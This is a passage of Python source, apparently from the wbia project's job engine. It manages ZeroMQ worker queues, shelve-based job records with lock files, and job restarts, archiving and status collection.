_spawner_func_ = spawn_background_process proc = _spawner_func_(func, *args, **kwargs) assert proc.is_alive(), 'proc (%s) died too soon' % (ut.get_funcname(func)) return proc if self.spawn_queue: self.engine_queue_proc = _spawner( engine_queue_loop, self.port_dict, self.engine_lanes ) self.collect_queue_proc = _spawner(collect_queue_loop, self.port_dict) if 
self.spawn_collector: self.collect_proc = _spawner( collector_loop, self.port_dict, dbdir, containerized ) if self.spawn_engine: if self.fg_engine: print('ENGINE IS IN DEBUG FOREGROUND MODE') # Spawn engine in foreground process assert self.num_engines == 1, 'fg engine only works with one engine' engine_loop(0, self.port_dict, dbdir) assert False, 'should never see this' else: # Normal case if self.engine_procs is None: self.engine_procs = {} for lane in self.engine_lanes: if lane not in self.engine_procs: self.engine_procs[lane] = [] for i in range(self.num_engines[lane]): proc = _spawner( engine_loop, i, self.port_dict, dbdir, containerized, lane ) self.engine_procs[lane].append(proc) # Check if online # wait for processes to spin up if self.spawn_queue: assert self.engine_queue_proc.is_alive(), 'engine died too soon' assert self.collect_queue_proc.is_alive(), 'collector queue died too soon' if self.spawn_collector: assert self.collect_proc.is_alive(), 'collector died too soon' if self.spawn_engine: for lane in self.engine_procs: for engine in self.engine_procs[lane]: assert engine.is_alive(), 'engine died too soon' def get_process_alive_status(self): status_dict = {} if self.spawn_queue: status_dict['engine_queue'] = self.engine_queue_proc.is_alive() status_dict['collect_queue'] = self.collect_queue_proc.is_alive() if self.spawn_collector: status_dict['collector'] = self.collect_proc.is_alive() if self.spawn_engine: for lane in self.engine_procs: for id_, engine in enumerate(self.engine_procs[lane]): engine_str = 'engine.%s.%s' % (lane, id_) status_dict[engine_str] = engine.is_alive() return status_dict def get_shelve_lock_filepath(shelve_filepath): shelve_lock_filepath = '%s.lock' % (shelve_filepath,) return shelve_lock_filepath def touch_shelve_lock_file(shelve_filepath): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) assert not exists(shelve_lock_filepath) ut.touch(shelve_lock_filepath, verbose=False) assert exists(shelve_lock_filepath) def delete_shelve_lock_file(shelve_filepath): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) assert exists(shelve_lock_filepath) ut.delete(shelve_lock_filepath, verbose=False) assert not exists(shelve_lock_filepath) def wait_for_shelve_lock_file(shelve_filepath, timeout=600): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) start_time = time.time() while exists(shelve_lock_filepath): current_time = time.time() elapsed = current_time - start_time if elapsed >= timeout: return False time.sleep(1) if int(elapsed) % 5 == 0: print('Waiting for %0.02f seconds for lock so far' % (elapsed,)) return True def get_shelve_value(shelve_filepath, key): wait_for_shelve_lock_file(shelve_filepath) with GLOBAL_SHELVE_LOCK: wait_for_shelve_lock_file(shelve_filepath) touch_shelve_lock_file(shelve_filepath) value = None try: with shelve.open(shelve_filepath, 'r') as shelf: value = shelf.get(key) except Exception: pass delete_shelve_lock_file(shelve_filepath) return value def set_shelve_value(shelve_filepath, key, value): wait_for_shelve_lock_file(shelve_filepath) with GLOBAL_SHELVE_LOCK: wait_for_shelve_lock_file(shelve_filepath) touch_shelve_lock_file(shelve_filepath) flag = False try: with shelve.open(shelve_filepath) as shelf: shelf[key] = value flag = True except Exception: pass delete_shelve_lock_file(shelve_filepath) return flag def get_shelve_filepaths(ibs, jobid): shelve_path = ibs.get_shelves_path() shelve_input_filepath = abspath(join(shelve_path, '%s.input.shelve' % (jobid,))) shelve_output_filepath = 
abspath(join(shelve_path, '%s.output.shelve' % (jobid,))) return shelve_input_filepath, shelve_output_filepath def initialize_process_record( record_filepath, shelve_input_filepath, shelve_output_filepath, shelve_path, shelve_archive_path, jobiface_id, ): MAX_ATTEMPTS = 20 ARCHIVE_DAYS = 14 timezone = pytz.timezone(TIMESTAMP_TIMEZONE) now = datetime.now(timezone) now = now.replace(microsecond=0) now = now.replace(second=0) now = now.replace(minute=0) now = now.replace(hour=0) archive_delta = timedelta(days=ARCHIVE_DAYS) archive_date = now - archive_delta archive_timestamp = archive_date.strftime(TIMESTAMP_FMTSTR) jobid = splitext(basename(record_filepath))[0] jobcounter = None # Load the engine record record = ut.load_cPkl(record_filepath, verbose=False) # Load the record info engine_request = record.get('request', None) attempts = record.get('attempts', 0) completed = record.get('completed', False) # Check status suppressed = attempts >= MAX_ATTEMPTS corrupted = engine_request is None # Load metadata metadata = get_shelve_value(shelve_input_filepath, 'metadata') if metadata is None: print('Missing metadata...corrupted') corrupted = True archived = False if not corrupted: jobcounter = metadata.get('jobcounter', None) times = metadata.get('times', {}) if jobcounter is None: print('Missing jobcounter...corrupted') corrupted = True job_age = None if not corrupted and completed: completed_timestamp = times.get('completed', None) if completed_timestamp is not None: try: archive_elapsed = calculate_timedelta( completed_timestamp, archive_timestamp ) job_age = archive_elapsed[-1] archived = job_age > 0 except Exception: args = ( completed_timestamp, archive_timestamp, ) print( '[job_engine] Could not determine archive status!\n\tCompleted: %r\n\tArchive: %r' % args ) if archived: with ut.Indenter('[client %d] ' % (jobiface_id)): color = 'brightmagenta' print_ = partial(ut.colorprint, color=color) print_('ARCHIVING JOB (AGE: %d SECONDS)' % (job_age,)) job_scr_filepath_list = list( ut.iglob(join(shelve_path, '%s*' % (jobid,))) ) for job_scr_filepath in job_scr_filepath_list: job_dst_filepath = job_scr_filepath.replace( shelve_path, shelve_archive_path ) ut.copy( job_scr_filepath, job_dst_filepath, overwrite=True ) # ut.copy allows for overwrite, ut.move does not ut.delete(job_scr_filepath) if archived: # We have archived the job, don't bother registering it engine_request = None else: if completed or suppressed or corrupted: # Register the job, pass the jobcounter and jobid only engine_request = None else: # We have a pending job, restart with the original request with ut.Indenter('[client %d] ' % (jobiface_id)): color = 'brightblue' if attempts == 0 else 'brightred' print_ = partial(ut.colorprint, color=color) print_( 'RESTARTING FAILED JOB FROM RESTART (ATTEMPT %d)' % (attempts + 1,) ) print_(ut.repr3(record_filepath)) # print_(ut.repr3(record)) times = metadata.get('times', {}) received = times['received'] engine_request['restart_jobid'] = jobid engine_request['restart_jobcounter'] = jobcounter engine_request['restart_received'] = received record['attempts'] = attempts + 1 ut.save_cPkl(record_filepath, record, verbose=False) values = jobcounter, jobid, engine_request, archived, completed, suppressed, corrupted return values class JobInterface(object): def __init__(jobiface, id_, port_dict, ibs=None): jobiface.id_ = id_ jobiface.ibs = ibs jobiface.verbose = 2 if VERBOSE_JOBS else 1 jobiface.port_dict = port_dict print('JobInterface ports:') ut.print_dict(jobiface.port_dict) def __del__(jobiface): 
if VERBOSE_JOBS: print('Cleaning up job frontend') if jobiface.engine_recieve_socket is not None: jobiface.engine_recieve_socket.disconnect( jobiface.port_dict['engine_pull_url'] ) jobiface.engine_recieve_socket.close() if jobiface.collect_recieve_socket is not None: jobiface.collect_recieve_socket.disconnect( jobiface.port_dict['collect_pull_url'] ) jobiface.collect_recieve_socket.close() # def init(jobiface): # # Starts several new processes # jobiface.initialize_background_processes() # # Does not create a new process, but connects sockets on this process # jobiface.initialize_client_thread() def initialize_client_thread(jobiface): """ Creates a ZMQ object in this thread. This talks to background processes. """ if jobiface.verbose: print('Initializing JobInterface') jobiface.engine_recieve_socket = ctx.socket(zmq.DEALER) # CHECK2 - REQ jobiface.engine_recieve_socket.setsockopt_string( zmq.IDENTITY, 'client%s.engine.DEALER' % (jobiface.id_,) ) jobiface.engine_recieve_socket.connect(jobiface.port_dict['engine_pull_url']) if jobiface.verbose: print( 'connect engine_pull_url = %r' % (jobiface.port_dict['engine_pull_url'],) ) jobiface.collect_recieve_socket = ctx.socket(zmq.DEALER) # CHECK2 - REQ jobiface.collect_recieve_socket.setsockopt_string( zmq.IDENTITY, 'client%s.collect.DEALER' % (jobiface.id_,) ) jobiface.collect_recieve_socket.connect(jobiface.port_dict['collect_pull_url']) if jobiface.verbose: print( 'connect collect_pull_url = %r' % (jobiface.port_dict['collect_pull_url'],) ) def queue_interrupted_jobs(jobiface): import tqdm ibs = jobiface.ibs if ibs is not None: shelve_path = ibs.get_shelves_path() shelve_path = shelve_path.rstrip('/') shelve_archive_path = '%s_ARCHIVE' % (shelve_path,) ut.ensuredir(shelve_archive_path) record_filepath_list = _get_engine_job_paths(ibs) num_records = len(record_filepath_list) print('Reloading %d engine jobs...' 
% (num_records,)) shelve_input_filepath_list = [] shelve_output_filepath_list = [] for record_filepath in record_filepath_list: jobid = splitext(basename(record_filepath))[0] shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths( ibs, jobid ) shelve_input_filepath_list.append(shelve_input_filepath) shelve_output_filepath_list.append(shelve_output_filepath) arg_iter = list( zip( record_filepath_list, shelve_input_filepath_list, shelve_output_filepath_list, [shelve_path] * num_records, [shelve_archive_path] * num_records, [jobiface.id_] * num_records, ) ) if len(arg_iter) > 0: values_list = ut.util_parallel.generate2( initialize_process_record, arg_iter ) values_list = list(values_list) else: values_list = [] print('Processed %d records' % (len(values_list),)) restart_jobcounter_list = [] restart_jobid_list = [] restart_request_list = [] global_jobcounter = 0 num_registered, num_restarted = 0, 0 num_completed, num_archived, num_suppressed, num_corrupted = 0, 0, 0, 0 for values in tqdm.tqdm(values_list): ( jobcounter, jobid, engine_request, archived, completed, suppressed, corrupted, ) = values if archived: assert engine_request is None num_archived += 1 continue if jobcounter is not None: global_jobcounter = max(global_jobcounter, jobcounter) if engine_request is None: assert not archived if completed: status = 'completed' num_completed += 1 elif suppressed: status = 'suppressed' num_suppressed += 1 else: status = 'corrupted' num_corrupted += 1 reply_notify = { 'jobid': jobid, 'status': status, 'action': 'register', } print('Sending register: %r' % (reply_notify,)) jobiface.collect_recieve_socket.send_json(reply_notify) reply = jobiface.collect_recieve_socket.recv_json() jobid_ = reply['jobid'] assert jobid_ == jobid else: num_restarted += 1 restart_jobcounter_list.append(jobcounter) restart_jobid_list.append(jobid) restart_request_list.append(engine_request) num_registered += 1 assert num_restarted == len(restart_jobcounter_list) print('Registered %d jobs...' % (num_registered,)) print('\t %d completed jobs' % (num_completed,)) print('\t %d restarted jobs' % (num_restarted,)) print('\t %d suppressed jobs' % (num_suppressed,)) print('\t %d corrupted jobs' % (num_corrupted,)) print('Archived %d jobs...' % (num_archived,)) # Update the jobcounter to be up to date update_notify = { '__set_jobcounter__': global_jobcounter, } print('Updating completed job counter: %r' % (update_notify,)) jobiface.engine_recieve_socket.send_json(update_notify) reply = jobiface.engine_recieve_socket.recv_json() jobcounter_ = reply['jobcounter'] assert jobcounter_ == global_jobcounter print('Re-sending %d engine jobs...' % (len(restart_jobcounter_list),)) index_list = np.argsort(restart_jobcounter_list) zipped = list( zip(restart_jobcounter_list, restart_jobid_list, restart_request_list) ) zipped = ut.take(zipped, index_list) for jobcounter, jobid, engine_request in tqdm.tqdm(zipped): jobiface.engine_recieve_socket.send_json(engine_request) reply = jobiface.engine_recieve_socket.recv_json() jobcounter_ = reply['jobcounter'] jobid_ = reply['jobid'] assert jobcounter_ == jobcounter assert jobid_ == jobid def queue_job( jobiface, action, callback_url=None, callback_method=None, lane='slow', *args, **kwargs ): r""" IBEIS: This is just a function that lives in the main thread and ships off a job. FIXME: I do not like having callback_url and callback_method specified like this with args and kwargs. 
If these must be there then they should be specified first, or THE PREFERED OPTION IS args and kwargs should not be specified without the * syntax The client - sends messages, and receives replies after they have been processed by the """ # NAME: job_client with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') request = {} try: if flask.request: request = { 'endpoint': flask.request.path, 'function': flask.request.endpoint, 'input': flask.request.processed, } except RuntimeError: pass engine_request = { 'action': action, 'args': args, 'kwargs': kwargs, 'callback_url': callback_url, 'callback_method': callback_method, 'request': request, 'restart_jobid': None, 'restart_jobcounter': None, 'restart_received': None, 'lane': lane, } if jobiface.verbose >= 2: print('Queue job: %s' % (ut.repr2(engine_request, truncate=True),)) # Send request to job jobiface.engine_recieve_socket.send_json(engine_request) reply_notify = jobiface.engine_recieve_socket.recv_json() print('reply_notify = %r' % (reply_notify,)) jobid = reply_notify['jobid'] ibs = jobiface.ibs if ibs is not None: shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) record_filename = '%s.pkl' % (jobid,) record_filepath = join(shelve_path, record_filename) record = { 'request': engine_request, 'attempts': 0, 'completed': False, } ut.save_cPkl(record_filepath, record, verbose=False) # Release memor action = None args = None kwargs = None callback_url = None callback_method = None request = None engine_request = None return jobid def get_job_id_list(jobiface): with ut.Indenter('[client %d] ' % (jobiface.id_)): if False: # jobiface.verbose >= 1: print('----') print('Request list of job ids') pair_msg = dict(action='job_id_list') # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_status(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request status of jobid=%r' % (jobid,)) pair_msg = dict(action='job_status', jobid=jobid) # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_status_dict(jobiface): with ut.Indenter('[client %d] ' % (jobiface.id_)): if False: # jobiface.verbose >= 1: print('----') print('Request list of job ids') pair_msg = dict(action='job_status_dict') # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_metadata(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request metadata of jobid=%r' % (jobid,)) pair_msg = dict(action='job_input', jobid=jobid) # CALLS: collector_request_metadata jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_result(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request result of jobid=%r' % (jobid,)) pair_msg = dict(action='job_result', jobid=jobid) # CALLER: collector_request_result jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_unpacked_result(jobiface, jobid): reply = jobiface.get_job_result(jobid) json_result = reply['json_result'] try: result = ut.from_json(json_result) 
except TypeError as ex: ut.printex(ex, keys=['json_result'], iswarning=True) result = json_result except Exception as ex: ut.printex(ex, 'Failed to unpack result', keys=['json_result']) result = reply['json_result'] # Release raw JSON result json_result = None return result def wait_for_job_result(jobiface, jobid, timeout=10, freq=0.1): t = ut.Timer(verbose=False) t.tic() while True: reply = jobiface.get_job_status(jobid) if reply['jobstatus'] == 'completed': return elif reply['jobstatus'] == 'exception': result = jobiface.get_unpacked_result(jobid) # raise Exception(result) print('Exception occured in engine') return result elif reply['jobstatus'] == 'working': pass elif reply['jobstatus'] == 'unknown': pass else: raise Exception('Unknown jobstatus=%r' % (reply['jobstatus'],)) reply = None # Release memory time.sleep(freq) if timeout is not None and t.toc() > timeout: raise Exception('Timeout') def collect_queue_loop(port_dict): name = 'collect' assert name is not None, 'must name queue' queue_name = name + '_queue' loop_name = queue_name + '_loop' update_proctitle(queue_name) interface_pull = port_dict['%s_pull_url' % (name,)] interface_push = port_dict['%s_push_url' % (name,)] with ut.Indenter('[%s] ' % (queue_name,)): if VERBOSE_JOBS: print('Init make_queue_loop: name=%r' % (name,)) # bind the client dealer to the queue router recieve_socket = ctx.socket(zmq.ROUTER) # CHECKED - ROUTER recieve_socket.setsockopt_string(zmq.IDENTITY, 'queue.' + name + '.' + 'ROUTER') recieve_socket.bind(interface_pull) if VERBOSE_JOBS: print('bind %s_url1 = %r' % (name, interface_pull)) # bind the server router to the queue dealer send_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER send_socket.setsockopt_string(zmq.IDENTITY, 'queue.' + name + '.' + 'DEALER') send_socket.bind(interface_push) if VERBOSE_JOBS: print('bind %s_url2 = %r' % (name, interface_push)) try: zmq.device(zmq.QUEUE, recieve_socket, send_socket) # CHECKED - QUEUE except KeyboardInterrupt: print('Caught ctrl+c in queue loop. Gracefully exiting') recieve_socket.unbind(interface_pull) recieve_socket.close() send_socket.unbind(interface_push) send_socket.close() if VERBOSE_JOBS: print('Exiting %s' % (loop_name,)) def engine_queue_loop(port_dict, engine_lanes): """ Specialized queue loop """ # Flow of information tags: # NAME: engine_queue name = 'engine' queue_name = name + '_queue' loop_name = queue_name + '_loop' update_proctitle(queue_name) print = partial(ut.colorprint, color='red') interface_engine_pull = port_dict['engine_pull_url'] interface_engine_push_dict = { lane: port_dict['engine_%s_push_url' % (lane,)] for lane in engine_lanes } interface_collect_pull = port_dict['collect_pull_url'] with ut.Indenter('[%s] ' % (queue_name,)): print('Init specialized make_queue_loop: name=%r' % (name,)) # bind the client dealer to the queue router engine_receive_socket = ctx.socket(zmq.ROUTER) # CHECK2 - REP engine_receive_socket.setsockopt_string( zmq.IDENTITY, 'special_queue.' + name + '.' + 'ROUTER' ) engine_receive_socket.bind(interface_engine_pull) if VERBOSE_JOBS: print('bind %s_url2 = %r' % (name, interface_engine_pull)) # bind the server router to the queue dealer engine_send_socket_dict = {} for lane in interface_engine_push_dict: engine_send_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER engine_send_socket.setsockopt_string( zmq.IDENTITY, 'special_queue.' + lane + '.' + name + '.' 
+ 'DEALER' ) engine_send_socket.bind(interface_engine_push_dict[lane]) if VERBOSE_JOBS: print( 'bind %s %s_url2 = %r' % (name, lane, interface_engine_push_dict[lane]) ) engine_send_socket_dict[lane] = engine_send_socket collect_recieve_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER collect_recieve_socket.setsockopt_string( zmq.IDENTITY, queue_name + '.collect.DEALER' ) collect_recieve_socket.connect(interface_collect_pull) if VERBOSE_JOBS: print('connect collect_pull_url = %r' % (interface_collect_pull)) # but this shows what is really going on: poller = zmq.Poller() poller.register(engine_receive_socket, zmq.POLLIN) for lane in engine_send_socket_dict: engine_send_socket = engine_send_socket_dict[lane] poller.register(engine_send_socket, zmq.POLLIN) # always start at 0 global_jobcounter = 0 try: while True: evts = dict(poller.poll()) if engine_receive_socket in evts: # CALLER: job_client idents, engine_request = rcv_multipart_json( engine_receive_socket, num=1, print=print ) set_jobcounter = engine_request.get('__set_jobcounter__', None) if set_jobcounter is not None: global_jobcounter = set_jobcounter reply_notify = { 'jobcounter': global_jobcounter, } print( '... notifying client that jobcounter was updated to %d' % (global_jobcounter,) ) # RETURNS: job_client_return send_multipart_json(engine_receive_socket, idents, reply_notify) continue # jobid = 'jobid-%04d' % (jobcounter,) jobid = '%s' % (uuid.uuid4(),) jobcounter = global_jobcounter + 1 received = _timestamp() action = engine_request['action'] args = engine_request['args'] kwargs = engine_request['kwargs'] callback_url = engine_request['callback_url'] callback_method = engine_request['callback_method'] request = engine_request['request'] restart_jobid = engine_request.get('restart_jobid', None) restart_jobcounter = engine_request.get('restart_jobcounter', None) restart_received = engine_request.get('restart_received', None) lane = engine_request.get('lane', 'slow') if lane not in engine_lanes: print( 'WARNING: did not recognize desired lane %r from %r' % (lane, engine_lanes) ) print('WARNING: Defaulting to slow lane') lane = 'slow' engine_request['lane'] = lane if restart_jobid is not None: '[RESTARTING] Replacing jobid=%s with previous restart_jobid=%s' % ( jobid, restart_jobid, ) jobid = restart_jobid if restart_jobcounter is not None: '[RESTARTING] Replacing jobcounter=%s with previous restart_jobcounter=%s' % ( jobcounter, restart_jobcounter, ) jobcounter = restart_jobcounter print('Creating jobid %r (counter %d)' % (jobid, jobcounter)) if restart_received is not None: received = restart_received ###################################################################### # Status: Received (Notify Collector) # Reply immediately with a new jobid reply_notify = { 'jobid': jobid, 'jobcounter': jobcounter, 'status': 'received', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector about new job') # CALLS: collector_notify collect_recieve_socket.send_json(reply_notify) ###################################################################### # Status: Received (Notify Client) if VERBOSE_JOBS: print('... 
notifying client that job was accepted') print('%r' % (idents,)) print('%r' % (reply_notify,)) # RETURNS: job_client_return send_multipart_json(engine_receive_socket, idents, reply_notify) ###################################################################### # Status: Metadata # Reply immediately with a new jobid metadata_notify = { 'jobid': jobid, 'metadata': { 'jobcounter': jobcounter, 'action': action, 'args': args, 'kwargs': kwargs, 'callback_url': callback_url, 'callback_method': callback_method, 'request': request, 'times': { 'received': received, 'started': None, 'updated': None, 'completed': None, 'runtime': None, 'turnaround': None, 'runtime_sec': None, 'turnaround_sec': None, }, 'lane': lane, }, 'action': 'metadata', } if VERBOSE_JOBS: print('...notifying collector about job metadata') # CALLS: collector_notify collect_recieve_socket.send_json(metadata_notify) ###################################################################### # Status: Accepted (Metadata Processed) # We have been accepted, let's update the global_jobcounter global_jobcounter = jobcounter # Reply immediately with a new jobid reply_notify = { 'jobid': jobid, 'status': 'accepted', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector about new job') # CALLS: collector_notify collect_recieve_socket.send_json(reply_notify) ###################################################################### # Status: Queueing on the Engine assert 'jobid' not in engine_request engine_request['jobid'] = jobid if VERBOSE_JOBS: print('... notifying backend engine to start') # CALL: engine_ engine_send_socket = engine_send_socket_dict[lane] send_multipart_json(engine_send_socket, idents, engine_request) # Release idents = None engine_request = None ###################################################################### # Status: Queued queued_notify = { 'jobid': jobid, 'status': 'queued', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector that job was queued') # CALLS: collector_notify collect_recieve_socket.send_json(queued_notify) except KeyboardInterrupt: print('Caught ctrl+c in %s queue. Gracefully exiting' % (loop_name,)) poller.unregister(engine_receive_socket) for lane in engine_send_socket_dict: engine_send_socket = engine_send_socket_dict[lane] poller.unregister(engine_send_socket) engine_receive_socket.unbind(interface_engine_pull) engine_receive_socket.close() for lane in interface_engine_push_dict: engine_send_socket = engine_send_socket_dict[lane] engine_send_socket.unbind(interface_engine_push_dict[lane]) engine_send_socket.close() collect_recieve_socket.disconnect(interface_collect_pull) collect_recieve_socket.close() if VERBOSE_JOBS: print('Exiting %s queue' % (loop_name,)) def engine_loop(id_, port_dict, dbdir, containerized, lane): r""" IBEIS: This will be part of a worker process with its own IBEISController instance. Needs to send where the results will go and then publish the results there. 
The engine_loop - receives messages, performs some action, and sends a reply, preserving the leading two message parts as routing identities """ # NAME: engine_ # CALLED_FROM: engine_queue import wbia try: import tensorflow as tf # NOQA from keras import backend as K # NOQA config = tf.ConfigProto() config.gpu_options.allow_growth = True sess = tf.Session(config=config) K.set_session(sess) except (ImportError, RuntimeError): pass # base_print = print # NOQA print = partial(ut.colorprint, color='brightgreen') with ut.Indenter('[engine %s %d] ' % (lane, id_)): interface_engine_push = port_dict['engine_%s_push_url' % (lane,)] interface_collect_pull = port_dict['collect_pull_url'] if VERBOSE_JOBS: print('Initializing %s engine %s' % (lane, id_)) print('connect engine_%s_push_url = %r' % (lane, interface_engine_push)) assert dbdir is not None engine_send_sock = ctx.socket(zmq.ROUTER) # CHECKED - ROUTER engine_send_sock.setsockopt_string( zmq.IDENTITY, 'engine.%s.%s' % (lane, id_), ) engine_send_sock.connect(interface_engine_push) collect_recieve_socket = ctx.socket(zmq.DEALER) collect_recieve_socket.setsockopt_string( zmq.IDENTITY, 'engine.%s.%s.collect.DEALER' % (lane, id_), ) collect_recieve_socket.connect(interface_collect_pull) if VERBOSE_JOBS: print('connect collect_pull_url = %r' % (interface_collect_pull,)) print('engine is initialized') ibs = wbia.opendb(dbdir=dbdir, use_cache=False, web=False, daily_backup=False) update_proctitle('engine_loop.%s.%s' % (lane, id_), dbname=ibs.dbname) try: while True: try: idents, engine_request = rcv_multipart_json( engine_send_sock, print=print ) action = engine_request['action'] jobid = engine_request['jobid'] args = engine_request['args'] kwargs = engine_request['kwargs'] callback_url = engine_request['callback_url'] callback_method = engine_request['callback_method'] lane_ = engine_request['lane'] if VERBOSE_JOBS: print('\tjobid = %r' % (jobid,)) print('\taction = %r' % (action,)) print('\targs = %r' % (args,)) print('\tkwargs = %r' % (kwargs,)) print('\tlane = %r' % (lane,)) print('\tlane_ = %r' % (lane_,)) # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': 'working', 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) engine_result = on_engine_request(ibs, jobid, action, args, kwargs) exec_status = engine_result['exec_status'] # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': 'publishing', 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) # Store results in the collector collect_request = { # 'idents': idents, 'action': 'store', 'jobid': jobid, 'engine_result': engine_result, 'callback_url': callback_url, 'callback_method': callback_method, } # if VERBOSE_JOBS: print( '...done working. pushing result to collector for jobid %s' % (jobid,) ) # CALLS: collector_store collect_recieve_socket.send_json(collect_request) # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': exec_status, 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) # We no longer need the engine result, and can clear it's memory engine_request = None engine_result = None collect_request = None except KeyboardInterrupt: raise except Exception as ex: result = ut.formatex(ex, keys=['jobid'], tb=True) result = ut.strip_ansi(result) print_ = partial(ut.colorprint, color='brightred') with ut.Indenter('[job engine worker error] '): print_(result) raise except KeyboardInterrupt: print('Caught ctrl+c in engine loop. 
Gracefully exiting') engine_send_sock.disconnect(interface_engine_push) engine_send_sock.close() collect_recieve_socket.disconnect(interface_collect_pull) collect_recieve_socket.close() # Release the IBEIS controller for each job, hopefully freeing memory ibs = None # Explicitly try to release GPU memory try: import torch torch.cuda.empty_cache() except Exception: pass # Explicitly release Python memory try: import gc gc.collect() except Exception: pass # ---- if VERBOSE_JOBS: print('Exiting engine loop') def on_engine_request( ibs, jobid, action, args, kwargs, attempts=3, retry_delay_min=1, retry_delay_max=60 ): """ Run whenever the engine recieves a message """ assert attempts > 0 attempts = int(attempts) assert 0 <= retry_delay_min and retry_delay_min <= 60 * 60 retry_delay_min = int(retry_delay_min) assert 0 <= retry_delay_max and retry_delay_max <= 60 * 60 retry_delay_max = int(retry_delay_max) assert retry_delay_min < retry_delay_max # Start working if VERBOSE_JOBS: print('starting job=%r' % (jobid,)) # Map actions to IBEISController calls here if action == 'helloworld': def helloworld(time_=0, *args, **kwargs): time.sleep(time_) retval = ('HELLO time_=%r ' % (time_,)) + ut.repr2((args, kwargs)) return retval action_func = helloworld else: # check for ibs func action_func = getattr(ibs, action) if VERBOSE_JOBS: print('resolving action=%r to wbia function=%r' % (action, action_func)) key = '__jobid__' kwargs[key] = jobid exec_status = None while exec_status is None: try: attempt = 0 while attempt < 10: # Global max attempts of 10 attempt += 1 try: result = action_func(*args, **kwargs) break # success, no exception, break out of the loop except Exception: if attempt < attempts: print( 'JOB %r FAILED (attempt %d of %d)!' % (jobid, attempt, attempts) ) retry_delay = random.uniform(retry_delay_min, retry_delay_max) print('\t WAITING %0.02f SECONDS THEN RETRYING' % (retry_delay,)) time.sleep(retry_delay) else: raise exec_status = 'completed' except Exception as ex: # Remove __jobid__ from kwargs if it's not accepted by the action_func if key in kwargs: kwargs.pop(key, None) continue result = ut.formatex(ex, keys=['jobid'], tb=True) result = ut.strip_ansi(result) exec_status = 'exception' json_result = ut.to_json(result) result = None # Clear any used memory engine_result = { 'exec_status': exec_status, 'json_result': json_result, 'jobid': jobid, } return engine_result def collector_loop(port_dict, dbdir, containerized): """ Service that stores completed algorithm results """ import wbia print = partial(ut.colorprint, color='yellow') with ut.Indenter('[collect] '): collect_rout_sock = ctx.socket(zmq.ROUTER) # CHECK2 - PULL collect_rout_sock.setsockopt_string(zmq.IDENTITY, 'collect.ROUTER') collect_rout_sock.connect(port_dict['collect_push_url']) if VERBOSE_JOBS: print('connect collect_push_url = %r' % (port_dict['collect_push_url'],)) ibs = wbia.opendb(dbdir=dbdir, use_cache=False, web=False, daily_backup=False) update_proctitle('collector_loop', dbname=ibs.dbname) shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) collector_data = {} try: while True: # several callers here # CALLER: collector_notify # CALLER: collector_store # CALLER: collector_request_status # CALLER: collector_request_metadata # CALLER: collector_request_result idents, collect_request = rcv_multipart_json( collect_rout_sock, print=print ) try: reply = on_collect_request( ibs, collect_request, collector_data, shelve_path, containerized=containerized, ) except Exception as ex: import traceback 
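                    # Log the offending request and fall back to an empty reply so the
                    # collector keeps serving instead of dying on one bad message.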
print(ut.repr3(collect_request)) ut.printex(ex, 'ERROR in collection') print(traceback.format_exc()) reply = {} send_multipart_json(collect_rout_sock, idents, reply) idents = None collect_request = None # Explicitly release Python memory try: import gc gc.collect() except Exception: pass except KeyboardInterrupt: print('Caught ctrl+c in collector loop. Gracefully exiting') collect_rout_sock.disconnect(port_dict['collect_push_url']) collect_rout_sock.close() if VERBOSE_JOBS: print('Exiting collector') def _timestamp(): timezone = pytz.timezone(TIMESTAMP_TIMEZONE) now = datetime.now(timezone) timestamp = now.strftime(TIMESTAMP_FMTSTR) return timestamp def invalidate_global_cache(jobid): global JOB_STATUS_CACHE JOB_STATUS_CACHE.pop(jobid, None) def get_collector_shelve_filepaths(collector_data, jobid): if jobid is None: return None, None shelve_input_filepath = collector_data.get(jobid, {}).get('input', None) shelve_output_filepath = collector_data.get(jobid, {}).get('output', None) return shelve_input_filepath, shelve_output_filepath def convert_to_date(timestamp): TIMESTAMP_FMTSTR_ = ' '.join(TIMESTAMP_FMTSTR.split(' ')[:-1]) timestamp_ = ' '.join(timestamp.split(' ')[:-1]) timestamp_date = datetime.strptime(timestamp_, TIMESTAMP_FMTSTR_) return timestamp_date def calculate_timedelta(start, end): start_date = convert_to_date(start) end_date = convert_to_date(end) delta = end_date - start_date total_seconds = int(delta.total_seconds()) total_seconds_ = total_seconds hours = total_seconds_ // (60 * 60) total_seconds_ -= hours * 60 * 60 minutes = total_seconds_ // 60 total_seconds_ -= minutes * 60 seconds = total_seconds_ return hours, minutes, seconds, total_seconds def on_collect_request( ibs, collect_request, collector_data, shelve_path, containerized=False ): """ Run whenever the collector recieves a message """ 